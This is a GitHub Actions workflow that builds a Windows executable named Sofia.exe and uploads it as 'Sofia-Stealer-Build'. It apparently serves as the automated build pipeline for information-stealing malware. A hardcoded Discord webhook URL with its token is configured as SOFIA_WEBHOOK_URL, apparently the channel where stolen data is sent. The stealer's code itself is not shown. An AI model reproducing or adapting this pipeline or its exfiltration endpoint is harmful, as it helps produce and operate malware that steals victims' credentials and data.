name: sofia build

on:
  push:
    branches: [ "main", "master" ]
  pull_request:
    branches: [ "main", "master" ]
  workflow_dispatch:

jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v4

    - name: Setup MSVC
      uses: ilammy/msvc-dev-cmd@v1

    - name: Build Sofia Stealer
      shell: cmd
      env:
        SOFIA_WEBHOOK_URL: ${{ secrets.WEBHOOK_URL || 'https://discord.com/api/webhooks/1499616167470301296/f-Zh5QvIFv61_bmYzEj-ze7lDeOiuhmDHG7oFz7Z_tHcIw8yJqVNusB7-F4YXCLZu210' }}
      run: |
        dir
        call .\build.bat release

    - name: Upload Artifact
      uses: actions/upload-artifact@v4
      with:
        name: Sofia-Stealer-Build
        path: Sofia.exe
